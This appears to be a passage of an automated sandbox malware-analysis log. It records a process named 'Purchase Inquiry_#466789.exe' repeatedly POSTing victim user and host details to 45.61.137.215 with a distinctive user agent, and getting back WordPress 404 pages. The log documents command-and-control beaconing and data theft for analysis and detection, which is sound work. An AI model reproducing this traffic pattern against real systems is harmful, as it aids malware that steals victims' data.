                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:51.768748045 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:53.890676975 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:52 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:53.890734911 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:33:53.890774965 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:33:53.890809059 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:33:53.890844107 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:33:53.890877008 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:33:53.890918016 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:53.890949965 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:53.890984058 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:53.891475916 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.44978645.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:54.084475994 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:54.089946032 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:56.281068087 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:54 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:56.281119108 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:56.281152964 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:56.281188011 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:56.281220913 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:56.281254053 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:56.281313896 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:56.281347990 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:56.281383038 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:33:56.281420946 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.44978745.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:56.437118053 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:56.442873955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:58.544697046 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:56 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:58.544756889 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:58.544794083 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:58.544826984 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:58.544861078 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:58.544895887 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:58.544930935 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:58.544965029 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:58.545000076 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
